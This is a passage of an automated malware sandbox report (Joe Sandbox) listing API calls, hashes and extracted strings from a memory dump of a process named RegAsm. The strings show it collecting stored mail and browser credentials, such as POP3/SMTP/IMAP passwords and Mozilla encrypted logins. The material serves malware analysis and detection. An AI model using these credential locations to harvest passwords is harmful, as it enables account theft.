                                                                                                                                                                                                • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                                • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3116012682-0
                                                                                                                                                                                                • Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                                • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                                • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                                                                                                • API String ID: 1865533344-362086290
                                                                                                                                                                                                • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                                • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                                • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                • API String ID: 1895597112-3210201812
                                                                                                                                                                                                • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                                • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                • API String ID: 1714764973-479759155
                                                                                                                                                                                                • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                                • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                • API String ID: 3137614212-1455797042
                                                                                                                                                                                                • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                                • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                • API String ID: 2814039832-2206097438
                                                                                                                                                                                                • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                                • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                                • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                • API String ID: 4171719235-3943159138
                                                                                                                                                                                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                                                                                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                • API String ID: 168965057-606283353
                                                                                                                                                                                                • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                • API String ID: 1428123949-3474136107
                                                                                                                                                                                                • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2998058495-0
                                                                                                                                                                                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
